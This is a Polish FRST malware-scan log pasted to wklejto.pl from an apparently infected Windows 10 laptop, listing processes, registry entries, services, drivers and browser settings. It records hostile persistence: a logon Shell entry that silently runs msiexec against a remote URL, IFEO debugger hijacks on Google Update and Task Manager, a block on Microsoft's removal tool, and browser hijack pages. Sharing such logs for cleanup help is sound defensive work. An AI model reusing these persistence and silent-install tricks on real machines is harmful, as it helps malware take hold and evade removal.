wklejto.pl

Dodane przez: ~Anonim (2017-06-19 16:22) -> text
1.
2.
3.
4.
5.
6.
7.
8.
9.
10.
11.
12.
13.
14.
15.
16.
17.
18.
19.
20.
21.
22.
23.
24.
25.
26.
27.
28.
29.
30.
31.
32.
33.
34.
35.
36.
37.
38.
39.
40.
41.
42.
43.
44.
45.
46.
47.
48.
49.
50.
51.
52.
53.
54.
55.
56.
57.
58.
59.
60.
61.
62.
63.
64.
65.
66.
67.
68.
69.
70.
71.
72.
73.
74.
75.
76.
77.
78.
79.
80.
81.
82.
83.
84.
85.
86.
87.
88.
89.
90.
91.
92.
93.
94.
95.
96.
97.
98.
99.
100.
101.
102.
103.
104.
105.
106.
107.
108.
109.
110.
111.
112.
113.
114.
115.
116.
117.
118.
119.
120.
121.
122.
123.
124.
125.
126.
127.
128.
129.
130.
131.
132.
133.
134.
135.
136.
137.
138.
139.
140.
141.
142.
143.
144.
145.
146.
147.
148.
149.
150.
151.
152.
153.
154.
155.
156.
157.
158.
159.
160.
161.
162.
163.
164.
165.
166.
167.
168.
169.
170.
171.
172.
173.
174.
175.
176.
177.
178.
179.
180.
181.
182.
183.
184.
185.
186.
187.
188.
189.
190.
191.
192.
193.
194.
195.
196.
197.
198.
199.
200.
201.
202.
203.
204.
205.
206.
207.
208.
209.
210.
211.
212.
213.
214.
215.
216.
217.
218.
219.
220.
221.
222.
223.
224.
225.
226.
227.
228.
229.
230.
231.
232.
233.
234.
235.
236.
237.
238.
239.
240.
241.
242.
243.
244.
245.
246.
247.
248.
249.
250.
251.
252.
253.
254.
255.
256.
257.
258.
259.
260.
261.
262.
263.
264.
265.
266.
267.
268.
269.
270.
271.
272.
273.
274.
275.
276.
277.
278.
279.
280.
281.
282.
283.
284.
285.
286.
287.
288.
289.
290.
291.
292.
293.
294.
295.
296.
297.
298.
299.
300.
301.
302.
303.
304.
305.
306.
307.
308.
309.
310.
311.
312.
313.
314.
315.
316.
317.
318.
319.
320.
321.
322.
323.
324.
325.
326.
327.
328.
329.
330.
331.
332.
333.
334.
335.
336.
337.
338.
339.
340.
341.
342.
343.
344.
345.
346.
347.
348.
349.
350.
351.
352.
353.
354.
355.
356.
357.
358.
359.
360.
361.
362.
363.
364.
365.
366.
367.
368.
369.
370.
371.
372.
373.
374.
375.
376.
377.
378.
379.
380.
381.
382.
383.
384.
385.
386.
387.
388.
389.
390.
391.
392.
393.
394.
395.
396.
397.
398.
399.
400.
401.
402.
403.
404.
405.
406.
407.
408.
409.
410.
411.
412.
413.
414.
415.
416.
417.
418.
419.
420.
421.
422.
423.
424.
425.
426.
427.
428.
429.
430.
431.
432.
433.
434.
435.
436.
437.
438.
439.
440.
441.
442.
443.
444.
445.
446.
447.
448.
449.
450.
451.
452.
453.
454.
455.
456.
457.
458.
459.
460.
461.
462.
463.
464.
465.
466.
467.
468.
469.
470.
471.
472.
473.
474.
475.
476.
477.
478.
479.
480.
481.
482.
483.
484.
485.
486.
487.
488.
489.
490.
491.
492.
Rezultaty skanowania Farbar Recovery Scan Tool (FRST) (x64) Wersja: 18-06-2017 01
Uruchomiony przez Beata (administrator)  DESKTOP-246SCMD (19-06-2017 16:17:40)
Uruchomiony z C:\Users\Beata\Downloads
Załadowane profile: Beata (Dostępne profile: defaultuser0 & Beata)
Platform: Windows 10 Pro Wersja 1607 (X64) Język: Polski (Polska)
Internet Explorer Wersja 11 (Domyślna przeglądarka: Edge)
Tryb startu: Normal
Instrukcja obsługi Farbar Recovery Scan Tool: http://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/
 
==================== Procesy (filtrowane) =================
 
(Załączenie wejścia w fixlist spowoduje zamknięcie procesu. Powiązany plik nie zostanie przeniesiony.)
 
(Intel Corporation) C:\Windows\System32\igfxCUIService.exe
(AVAST Software) C:\Program Files\AVAST Software\Avast\AvastSvc.exe
(Broadcom Corporation.) C:\Windows\System32\BtwRSupportService.exe
(Microsoft Corporation) C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe
(Filseclab Corporation Limited) C:\Program Files (x86)\ScreenShot\SSSvc.exe
(Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPEnhService.exe
() C:\Windows\KMS-R@1n.exe
(Conexant Systems Inc.) C:\Windows\System32\CxAudMsg64.exe
(Microsoft Corporation) C:\Windows\Microsoft.NET\Framework64\v3.0\WPF\PresentationFontCache.exe
(AVAST Software s.r.o.) C:\Program Files\AVAST Software\Avast\x64\aswidsagenta.exe
(Microsoft Corporation) C:\Windows\SysWOW64\svchost.exe
(Intel Corporation) C:\Windows\System32\igfxEM.exe
(Intel Corporation) C:\Windows\System32\igfxHK.exe
() C:\Windows\System32\igfxTray.exe
(Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPEnh.exe
(Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPHelper.exe
(Mozilla Corporation) C:\Program Files\Mozilla Firefox\firefox.exe
(Mozilla Corporation) C:\Program Files\Mozilla Firefox\firefox.exe
(Mozilla Corporation) C:\Program Files\Mozilla Firefox\firefox.exe
(Conexant Systems, Inc.) C:\Program Files\CONEXANT\cAudioFilterAgent\CAudioFilterAgent64.exe
(Realtek semiconductor) C:\Windows\RTFTrack.exe
(AVAST Software) C:\Program Files\AVAST Software\Avast\AvastUI.exe
(Piriform Ltd) C:\Program Files\CCleaner\CCleaner64.exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe
(Microsoft Corporation) C:\Windows\System32\SppExtComObj.Exe
(Microsoft Corporation) C:\Windows\ImmersiveControlPanel\SystemSettings.exe
(Microsoft Corporation) C:\Windows\System32\wbem\WMIC.exe
 
==================== Rejestr (filtrowane) ====================
 
(Załączenie wejścia w fixlist spowoduje usunięcie obiektu z rejestru lub przywrócenie jego domyślnej postaci. Powiązany plik nie zostanie przeniesiony.)
 
HKLM\...\Run: [cAudioFilterAgent] => C:\Program Files\Conexant\cAudioFilterAgent\cAudioFilterAgent64.exe [935104 2014-11-25] (Conexant Systems, Inc.)
HKLM\...\Run: [SmartAudio] => C:\Program Files\CONEXANT\SAII\SACpl.exe [1830616 2014-04-10] (Conexant Systems, Inc.)
HKLM\...\Run: [RtsFT] => C:\Windows\RTFTrack.exe [9309936 2015-08-30] (Realtek semiconductor)
HKLM\...\Run: [SynTPEnh] => C:\Program Files\Synaptics\SynTP\SynTPEnh.exe [3944136 2015-06-03] (Synaptics Incorporated)
HKLM\...\Run: [AvastUI.exe] => C:\Program Files\AVAST Software\Avast\AvLaunch.exe [213824 2017-05-09] (AVAST Software)
HKLM Group Policy restriction on software: %systemroot%\system32\mrt.exe <====== UWAGA
HKU\S-1-5-21-4154965311-55385270-3539469186-1001\...\Run: [background_fault] => C:\Users\Beata\AppData\Local\background_fault\aswRD.exe [1419576 2017-04-06] (AVAST Software) <===== UWAGA
HKU\S-1-5-21-4154965311-55385270-3539469186-1001\...\Run: [CCleaner Monitoring] => C:\Program Files\CCleaner\CCleaner64.exe [9803992 2017-06-13] (Piriform Ltd)
HKU\S-1-5-21-4154965311-55385270-3539469186-1001\...\Policies\system: [Shell] explorer.exe,msiexec.exe /i hxxp://point.ltdmsjq.com/?data=zDlkMj85FdM5FkMdOUY1FTIyRTM1MTVSOTJWOURSOWHxFkJWOH== /q <===== UWAGA
HKU\S-1-5-21-4154965311-55385270-3539469186-1001\...\MountPoints2: {1302c679-9390-11e6-ab27-201a06a527a1} - "E:\WD Drive Unlock.exe" autoplay=true
IFEO\GoogleUpdate.exe: [Debugger] 324095823984.exe
IFEO\GoogleUpdaterService.exe: [Debugger] 8736459873644.exe
IFEO\taskmgr.exe: [Debugger] 
ShellIconOverlayIdentifiers: [00asw] -> {472083B0-C522-11CF-8763-00608CC02F24} => C:\Program Files\AVAST Software\Avast\ashShA64.dll [2017-05-09] (AVAST Software)
ShellIconOverlayIdentifiers: [00avast] -> {472083B0-C522-11CF-8763-00608CC02F24} => C:\Program Files\AVAST Software\Avast\ashShA64.dll [2017-05-09] (AVAST Software)
 
==================== Internet (filtrowane) ====================
 
(Załączenie wejścia w fixlist, w przypadku gdy jest to obiekt rejestru, spowoduje usunięcie go z rejestru lub przywrócenie jego domyślnej postaci.)
 
Tcpip\Parameters: [DhcpNameServer] 192.168.0.1
Tcpip\..\Interfaces\{18c84cf5-7a81-46dd-ae67-3c8e6cadad5d}: [DhcpNameServer] 192.168.1.1
Tcpip\..\Interfaces\{8c9b09ac-f957-4a41-b53b-677e866856be}: [DhcpNameServer] 192.168.0.1
 
Internet Explorer:
==================
HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.ourluckysites.com/?type=hp&ts=1493726609&z=f61585ccd1834ea565ba36ag1z1t4c2m0obq9qcecb&from=ypid&uid=SamsungXSSDX840XEVOX120GB_S1D5NSAF510371L
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.ourluckysites.com/?type=hp&ts=1493726609&z=f61585ccd1834ea565ba36ag1z1t4c2m0obq9qcecb&from=ypid&uid=SamsungXSSDX840XEVOX120GB_S1D5NSAF510371L
HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.ourluckysites.com/search/?type=ds&ts=1493726609&z=f61585ccd1834ea565ba36ag1z1t4c2m0obq9qcecb&from=ypid&uid=SamsungXSSDX840XEVOX120GB_S1D5NSAF510371L&q={searchTerms}
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.ourluckysites.com/search/?type=ds&ts=1493726609&z=f61585ccd1834ea565ba36ag1z1t4c2m0obq9qcecb&from=ypid&uid=SamsungXSSDX840XEVOX120GB_S1D5NSAF510371L&q={searchTerms}
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.ourluckysites.com/?type=hp&ts=1493726609&z=f61585ccd1834ea565ba36ag1z1t4c2m0obq9qcecb&from=ypid&uid=SamsungXSSDX840XEVOX120GB_S1D5NSAF510371L
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.ourluckysites.com/?type=hp&ts=1493726609&z=f61585ccd1834ea565ba36ag1z1t4c2m0obq9qcecb&from=ypid&uid=SamsungXSSDX840XEVOX120GB_S1D5NSAF510371L
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = hxxp://www.ourluckysites.com/search/?type=ds&ts=1493726609&z=f61585ccd1834ea565ba36ag1z1t4c2m0obq9qcecb&from=ypid&uid=SamsungXSSDX840XEVOX120GB_S1D5NSAF510371L&q={searchTerms}
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Search_URL = hxxp://www.ourluckysites.com/search/?type=ds&ts=1493726609&z=f61585ccd1834ea565ba36ag1z1t4c2m0obq9qcecb&from=ypid&uid=SamsungXSSDX840XEVOX120GB_S1D5NSAF510371L&q={searchTerms}
HKU\S-1-5-21-4154965311-55385270-3539469186-1001\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.ourluckysites.com/?type=hp&ts=1493726609&z=f61585ccd1834ea565ba36ag1z1t4c2m0obq9qcecb&from=ypid&uid=SamsungXSSDX840XEVOX120GB_S1D5NSAF510371L
HKU\S-1-5-21-4154965311-55385270-3539469186-1001\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.ourluckysites.com/?type=hp&ts=1493726609&z=f61585ccd1834ea565ba36ag1z1t4c2m0obq9qcecb&from=ypid&uid=SamsungXSSDX840XEVOX120GB_S1D5NSAF510371L
SearchScopes: HKLM -> DefaultScope {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = hxxp://www.ourluckysites.com/search/?type=ds&ts=1493726609&z=f61585ccd1834ea565ba36ag1z1t4c2m0obq9qcecb&from=ypid&uid=SamsungXSSDX840XEVOX120GB_S1D5NSAF510371L&q={searchTerms}
SearchScopes: HKLM -> {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = hxxp://www.ourluckysites.com/search/?type=ds&ts=1493726609&z=f61585ccd1834ea565ba36ag1z1t4c2m0obq9qcecb&from=ypid&uid=SamsungXSSDX840XEVOX120GB_S1D5NSAF510371L&q={searchTerms}
SearchScopes: HKLM-x32 -> DefaultScope {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = hxxp://www.ourluckysites.com/search/?type=ds&ts=1493726609&z=f61585ccd1834ea565ba36ag1z1t4c2m0obq9qcecb&from=ypid&uid=SamsungXSSDX840XEVOX120GB_S1D5NSAF510371L&q={searchTerms}
SearchScopes: HKLM-x32 -> {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = hxxp://www.ourluckysites.com/search/?type=ds&ts=1493726609&z=f61585ccd1834ea565ba36ag1z1t4c2m0obq9qcecb&from=ypid&uid=SamsungXSSDX840XEVOX120GB_S1D5NSAF510371L&q={searchTerms}
SearchScopes: HKU\S-1-5-21-4154965311-55385270-3539469186-1001 -> DefaultScope {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = hxxp://www.ourluckysites.com/search/?type=ds&ts=1493726609&z=f61585ccd1834ea565ba36ag1z1t4c2m0obq9qcecb&from=ypid&uid=SamsungXSSDX840XEVOX120GB_S1D5NSAF510371L&q={searchTerms}
SearchScopes: HKU\S-1-5-21-4154965311-55385270-3539469186-1001 -> {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = hxxp://www.ourluckysites.com/search/?type=ds&ts=1493726609&z=f61585ccd1834ea565ba36ag1z1t4c2m0obq9qcecb&from=ypid&uid=SamsungXSSDX840XEVOX120GB_S1D5NSAF510371L&q={searchTerms}
BHO: Lync Browser Helper -> {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} -> C:\Program Files (x86)\Microsoft Office\root\VFS\ProgramFilesX64\Microsoft Office\Office16\OCHelper.dll [2017-06-16] (Microsoft Corporation)
BHO: STATISTICA Browser Helper -> {990A8747-93BF-4EF7-B72E-94A6884B98C2} -> C:\Program Files\Dell\Statistica 13\StaBHO.dll [2016-06-20] (Dell Inc.)
BHO: Microsoft OneDrive for Business Browser Helper -> {D0498E0A-45B7-42AE-A9AA-ABA463DBD3BF} -> C:\Program Files (x86)\Microsoft Office\root\VFS\ProgramFilesX64\Microsoft Office\Office16\GROOVEEX.DLL [2017-06-16] (Microsoft Corporation)
BHO-x32: Lync Browser Helper -> {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} -> C:\Program Files (x86)\Microsoft Office\root\Office16\OCHelper.dll [2017-06-16] (Microsoft Corporation)
BHO-x32: STATISTICA Browser Helper -> {990A8747-93BF-4EF7-B72E-94A6884B98C2} -> C:\Program Files\Dell\Statistica 13\Support\StaBHO.dll [2016-06-19] (Dell Inc.)
BHO-x32: Microsoft OneDrive for Business Browser Helper -> {D0498E0A-45B7-42AE-A9AA-ABA463DBD3BF} -> C:\Program Files (x86)\Microsoft Office\root\Office16\GROOVEEX.DLL [2017-06-16] (Microsoft Corporation)
Handler-x32: mso-minsb-roaming.16 - {83C25742-A9F7-49FB-9138-434302C88D07} - C:\Program Files (x86)\Microsoft Office\root\Office16\MSOSB.DLL [2017-06-16] (Microsoft Corporation)
Handler-x32: mso-minsb.16 - {42089D2D-912D-4018-9087-2B87803E93FB} - C:\Program Files (x86)\Microsoft Office\root\Office16\MSOSB.DLL [2017-06-16] (Microsoft Corporation)
Handler-x32: osf-roaming.16 - {42089D2D-912D-4018-9087-2B87803E93FB} - C:\Program Files (x86)\Microsoft Office\root\Office16\MSOSB.DLL [2017-06-16] (Microsoft Corporation)
Handler-x32: osf.16 - {5504BE45-A83B-4808-900A-3A5C36E7F77A} - C:\Program Files (x86)\Microsoft Office\root\Office16\MSOSB.DLL [2017-06-16] (Microsoft Corporation)
 
Edge: 
======
Edge HomeButtonPage: HKU\S-1-5-21-4154965311-55385270-3539469186-1001 -> hxxp://www.ourluckysites.com/?type=hp&ts=1493726609&z=f61585ccd1834ea565ba36ag1z1t4c2m0obq9qcecb&from=ypid&uid=SamsungXSSDX840XEVOX120GB_S1D5NSAF510371L
 
FireFox:
========
FF DefaultProfile: evhfedm2.default
FF DefaultProfile: 10h3e2nq.default
FF ProfilePath: C:\Users\Beata\AppData\Roaming\Mozilla\Firefox\Profiles\evhfedm2.default [2017-06-19]
FF Extension: (Avast SafePrice) - C:\Users\Beata\AppData\Roaming\Mozilla\Firefox\Profiles\evhfedm2.default\Extensions\sp@avast.com.xpi [2017-06-18]
FF Extension: (Avast Online Security) - C:\Users\Beata\AppData\Roaming\Mozilla\Firefox\Profiles\evhfedm2.default\Extensions\wrc@avast.com.xpi [2017-06-18]
FF ProfilePath: C:\Users\Beata\AppData\Roaming\Firefox\Firefox\Profiles\10h3e2nq.default [2017-05-31] <==== UWAGA
FF Extension: (SimilarWeb) - C:\Users\Beata\AppData\Roaming\Firefox\Firefox\Profiles\10h3e2nq.default\Extensions\@DA3566E2-F709-11E5-8E87-A604BC8E7F8B.xpi [2017-05-16] [Brak podpisu cyfrowego]
FF Extension: (HSearch) - C:\Users\Beata\AppData\Roaming\Firefox\Firefox\Profiles\10h3e2nq.default\Extensions\@E97YHOMI-FU8L-IM23-VUT9-RVDZT7M8XL8H.xpi [2017-05-16] [Brak podpisu cyfrowego]
FF Extension: (FF Adr) - C:\Users\Beata\AppData\Roaming\Firefox\Firefox\Profiles\10h3e2nq.default\Extensions\@H99KV4DO-UCCF-9PFO-9ZLK-8RRP4FVOKD9O.xpi [2017-04-25] [Brak podpisu cyfrowego]
FF Extension: (Polski Language Pack) - C:\Users\Beata\AppData\Roaming\Firefox\Firefox\Profiles\10h3e2nq.default\Extensions\langpack-pl@firefox.mozilla.org.xpi [2017-05-31] [Brak podpisu cyfrowego]
FF SearchPlugin: C:\Users\Beata\AppData\Roaming\Firefox\Firefox\Profiles\10h3e2nq.default\searchplugins\startsearch.xml [2017-05-31]
FF Plugin-x32: @microsoft.com/Lync,version=15.0 -> C:\Program Files (x86)\Microsoft Office\root\VFS\ProgramFilesX86\Mozilla Firefox\plugins\npmeetingjoinpluginoc.dll [2017-05-26] (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 -> C:\Program Files (x86)\Microsoft Office\root\Office16\NPSPWRAP.DLL [2017-05-26] (Microsoft Corporation)
FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.33.5\npGoogleUpdate3.dll [Brak pliku]
FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.33.5\npGoogleUpdate3.dll [Brak pliku]
FF Plugin-x32: @videolan.org/vlc,version=2.2.2 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [2017-05-24] (VideoLAN)
FF Plugin-x32: @videolan.org/vlc,version=2.2.4 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [2017-05-24] (VideoLAN)
FF Plugin-x32: @videolan.org/vlc,version=2.2.6 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [2017-05-24] (VideoLAN)
 
Chrome: 
=======
CHR HKLM-x32\...\Chrome\Extension: [eofcbnmajmjmplflapaojjnihcjkigck] - hxxps://clients2.google.com/service/update2/crx
CHR HKLM-x32\...\Chrome\Extension: [gomekmidlodglbbmalcneegieacbdmki] - hxxps://clients2.google.com/service/update2/crx
HKU\S-1-5-21-4154965311-55385270-3539469186-1001\...\StartMenuInternet\ChromeHTML: -> C:\Program Files (x86)\Dohat\Application\chrome.exe <==== UWAGA
 
==================== Usługi (filtrowane) ====================
 
(Załączenie wejścia w fixlist spowoduje jego usunięcie z rejestru. Powiązany plik nie zostanie przeniesiony, o ile nie zostanie załączony z osobna.)
 
R3 aswbIDSAgent; C:\Program Files\AVAST Software\Avast\x64\aswidsagenta.exe [7346208 2017-05-09] (AVAST Software s.r.o.)
R2 avast! Antivirus; C:\Program Files\AVAST Software\Avast\AvastSvc.exe [263304 2017-05-09] (AVAST Software)
R2 BcmBtRSupport; C:\Windows\system32\BtwRSupportService.exe [2297104 2015-10-12] (Broadcom Corporation.)
S2 BIT; C:\ProgramData\BIT\BIT.dll [1812992 2017-06-08] () [Brak podpisu cyfrowego] <==== UWAGA
R2 ClickToRunSvc; C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe [4122816 2017-06-10] (Microsoft Corporation)
R2 GameExplorerUpdate; C:\ProgramData\Microsoft\Windows\GameExplorer\Resources.dll [113664 2017-04-19] () [Brak podpisu cyfrowego]
R2 igfxCUIService2.0.0.0; C:\Windows\system32\igfxCUIService.exe [373752 2017-04-23] (Intel Corporation)
R2 KMS-R@1n; C:\Windows\KMS-R@1n.exe [26112 2016-10-16] () [Brak podpisu cyfrowego]
S3 Sense; C:\Program Files\Windows Defender Advanced Threat Protection\MsSense.exe [2889896 2016-09-15] (Microsoft Corporation)
S4 snare; C:\Users\Beata\AppData\Local\snare\Snare.dll [1050112 2017-06-08] () [Brak podpisu cyfrowego] <==== UWAGA
R2 SSSvc; C:\Program Files (x86)\ScreenShot\SSSvc.exe [139744 2016-11-02] (Filseclab Corporation Limited)
R2 SynTPEnhService; C:\Program Files\Synaptics\SynTP\SynTPEnhService.exe [249032 2015-06-03] (Synaptics Incorporated)
S3 WdNisSvc; C:\Program Files\Windows Defender\NisSrv.exe [347320 2017-04-28] (Microsoft Corporation)
S3 WinDefend; C:\Program Files\Windows Defender\MsMpEng.exe [103712 2017-04-28] (Microsoft Corporation)
S3 gupdatem; "C:\Program Files (x86)\Google\Update\GoogleUpdate.exe" /medsvc [X]
 
===================== Sterowniki (filtrowane) ======================
 
(Załączenie wejścia w fixlist spowoduje jego usunięcie z rejestru. Powiązany plik nie zostanie przeniesiony, o ile nie zostanie załączony z osobna.)
 
R1 aswbidsdriver; C:\Windows\system32\drivers\aswbidsdrivera.sys [311808 2017-05-09] (AVAST Software s.r.o.)
R0 aswbidsh; C:\Windows\system32\drivers\aswbidsha.sys [190256 2017-05-09] (AVAST Software s.r.o.)
R0 aswblog; C:\Windows\system32\drivers\aswbloga.sys [334576 2017-05-09] (AVAST Software s.r.o.)
R0 aswbuniv; C:\Windows\system32\drivers\aswbuniva.sys [49016 2017-05-09] (AVAST Software s.r.o.)
S3 aswHwid; C:\Windows\system32\drivers\aswHwid.sys [38296 2017-05-09] (AVAST Software)
R1 aswKbd; C:\Windows\system32\drivers\aswKbd.sys [32600 2017-05-09] (AVAST Software)
R2 aswMonFlt; C:\Windows\system32\drivers\aswMonFlt.sys [128648 2017-05-09] (AVAST Software)
R1 aswRdr; C:\Windows\system32\drivers\aswRdr2.sys [101152 2017-05-09] (AVAST Software)
R0 aswRvrt; C:\Windows\system32\drivers\aswRvrt.sys [75704 2017-05-09] (AVAST Software)
R1 aswSnx; C:\Windows\system32\drivers\aswSnx.sys [1007160 2017-05-09] (AVAST Software)
R1 aswSP; C:\Windows\system32\drivers\aswSP.sys [569192 2017-05-09] (AVAST Software)
R2 aswStm; C:\Windows\system32\drivers\aswStm.sys [158880 2017-05-18] (AVAST Software)
R0 aswVmm; C:\Windows\system32\drivers\aswVmm.sys [339696 2017-05-09] (AVAST Software)
R3 bcbtums; C:\Windows\system32\drivers\bcbtums.sys [227144 2015-10-12] (Broadcom Corporation.)
R3 BCM43XX; C:\Windows\system32\DRIVERS\bcmwl63a.sys [7585280 2016-07-16] (Broadcom Corporation)
S3 dg_ssudbus; C:\Windows\system32\DRIVERS\ssudbus.sys [131712 2016-09-05] (Samsung Electronics Co., Ltd.)
R1 iSafeKrnl; C:\Program Files (x86)\Elex-tech\YAC\iSafeKrnl.sys [262344 2016-05-23] (Elex do Brasil Participações Ltda) <==== UWAGA
S3 iSafeKrnlBoot; C:\Windows\System32\DRIVERS\iSafeKrnlBoot.sys [55056 2016-05-23] (Elex do Brasil Participações Ltda) <==== UWAGA
R1 iSafeNetFilter; C:\Windows\System32\DRIVERS\iSafeNetFilter.sys [52392 2016-05-19] (Elex do Brasil Participações Ltda) <==== UWAGA
S3 NetAdapterCx; C:\Windows\System32\drivers\NetAdapterCx.sys [90624 2016-07-16] ()
S3 RTSUER; C:\Windows\system32\Drivers\RtsUer.sys [410880 2015-07-03] (Realsil Semiconductor Corporation)
S3 rtsuvc; C:\Windows\system32\DRIVERS\rtsuvc.sys [3059440 2015-08-30] (Realtek Semiconductor Corp.)
R3 SmbDrvI; C:\Windows\system32\DRIVERS\Smb_driver_Intel.sys [42696 2015-06-03] (Synaptics Incorporated)
S3 ssudmdm; C:\Windows\system32\DRIVERS\ssudmdm.sys [165504 2016-09-05] (Samsung Electronics Co., Ltd.)
S3 WdBoot; C:\Windows\system32\drivers\WdBoot.sys [44056 2016-07-16] (Microsoft Corporation)
S3 WdFilter; C:\Windows\system32\drivers\WdFilter.sys [290144 2016-07-16] (Microsoft Corporation)
S3 WdNisDrv; C:\Windows\System32\Drivers\WdNisDrv.sys [123232 2016-07-16] (Microsoft Corporation)
 
==================== NetSvcs (filtrowane) ===================
 
(Załączenie wejścia w fixlist spowoduje jego usunięcie z rejestru. Powiązany plik nie zostanie przeniesiony, o ile nie zostanie załączony z osobna.)
 
 
==================== Jeden miesiąc - utworzone pliki i foldery ========
 
(Załączenie wejścia w fixlist spowoduje przeniesienie pliku/folderu.)
 
2017-06-19 16:17 - 2017-06-19 16:17 - 00019232 _____ C:\Users\Beata\Downloads\FRST.txt
2017-06-19 16:16 - 2017-06-19 16:17 - 00000000 ____D C:\FRST
2017-06-19 16:15 - 2017-06-19 16:15 - 02439680 _____ (Farbar) C:\Users\Beata\Downloads\FRST64.exe
2017-06-19 16:15 - 2017-06-19 16:15 - 00000000 ____D C:\ProgramData\SWCUTemp
2017-06-19 00:44 - 2017-06-19 00:44 - 01130328 _____ (Google Inc.) C:\Users\Beata\Downloads\ChromeSetup.exe
2017-06-19 00:07 - 2017-04-21 23:53 - 00029376 _____ (Microsoft Corporation) C:\Windows\SysWOW64\aspnet_counters.dll
2017-06-19 00:07 - 2017-04-21 23:53 - 00018600 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msvcr100_clr0400.dll
2017-06-19 00:07 - 2017-04-21 23:50 - 00030912 _____ (Microsoft Corporation) C:\Windows\system32\aspnet_counters.dll
2017-06-19 00:07 - 2017-04-21 23:50 - 00018592 _____ (Microsoft Corporation) C:\Windows\system32\msvcr100_clr0400.dll
2017-06-19 00:07 - 2017-04-11 20:27 - 00993632 _____ (Microsoft Corporation) C:\Windows\system32\msvcr120_clr0400.dll
2017-06-19 00:07 - 2017-04-11 20:27 - 00690008 _____ (Microsoft Corporation) C:\Windows\system32\msvcp120_clr0400.dll
2017-06-19 00:07 - 2017-03-15 20:15 - 00987840 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msvcr120_clr0400.dll
2017-06-19 00:07 - 2017-03-15 20:15 - 00485576 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msvcp120_clr0400.dll
2017-06-18 23:53 - 2017-06-18 23:53 - 00002870 _____ C:\Windows\System32\Tasks\CCleanerSkipUAC
2017-06-18 23:53 - 2017-06-18 23:53 - 00000863 _____ C:\Users\Public\Desktop\CCleaner.lnk
2017-06-18 23:53 - 2017-06-18 23:53 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\CCleaner
2017-06-18 23:53 - 2017-06-18 23:53 - 00000000 ____D C:\Program Files\CCleaner
2017-06-18 23:51 - 2017-06-18 23:51 - 00000000 ____D C:\Users\Beata\AppData\Local\Opera Software
2017-06-18 23:50 - 2017-06-18 23:50 - 00004252 _____ C:\Windows\System32\Tasks\Opera scheduled Autoupdate 1497822655
2017-06-18 23:50 - 2017-06-18 23:50 - 00000000 ____D C:\Users\Beata\AppData\Roaming\Opera Software
2017-06-18 23:49 - 2017-06-18 23:49 - 09598376 _____ (Piriform Ltd) C:\Users\Beata\Downloads\ccsetup531.exe
2017-06-18 23:48 - 2017-06-18 23:48 - 01473621 _____ (Panepo ) C:\Users\Beata\Downloads\CCleaner-13061-AsystentPobierania_1861245590.exe
2017-06-16 23:51 - 2017-06-16 23:51 - 00025178 _____ C:\Users\Beata\Downloads\praca (5).tex
2017-06-16 23:51 - 2017-06-16 23:51 - 00025178 _____ C:\Users\Beata\Downloads\praca (4).tex
2017-06-15 19:17 - 2017-06-15 19:17 - 00000000 ___SD C:\Windows\UpdateAssistantV2
2017-06-15 15:43 - 2017-06-15 15:48 - 00000000 ____D C:\Users\Beata\AppData\Local\Mozilla
2017-06-15 15:43 - 2017-06-15 15:43 - 00000993 _____ C:\Users\Public\Desktop\Mozilla Firefox.lnk
2017-06-15 15:43 - 2017-06-15 15:43 - 00000000 ____D C:\Program Files\Mozilla Firefox
2017-06-15 15:43 - 2017-06-15 15:43 - 00000000 ____D C:\Program Files (x86)\Mozilla Maintenance Service
2017-06-15 15:42 - 2017-06-15 15:42 - 48617672 _____ (Mozilla) C:\Users\Beata\Downloads\Firefox%20Setup%2054.0.exe
2017-06-15 15:40 - 2017-06-15 15:40 - 01473621 _____ (Panepo ) C:\Users\Beata\Downloads\Firefox-13108-AsystentPobierania_2329452994 (1).exe
2017-06-15 15:38 - 2017-06-15 15:38 - 01473621 _____ (Panepo ) C:\Users\Beata\Downloads\Firefox-13108-AsystentPobierania_2329452994.exe
2017-06-15 15:05 - 2017-06-15 15:05 - 00001079 _____ C:\Users\Public\Desktop\Revo Uninstaller.lnk
2017-06-15 15:05 - 2017-06-15 15:05 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Revo Uninstaller
2017-06-15 15:05 - 2017-06-15 15:05 - 00000000 ____D C:\Program Files\VS Revo Group
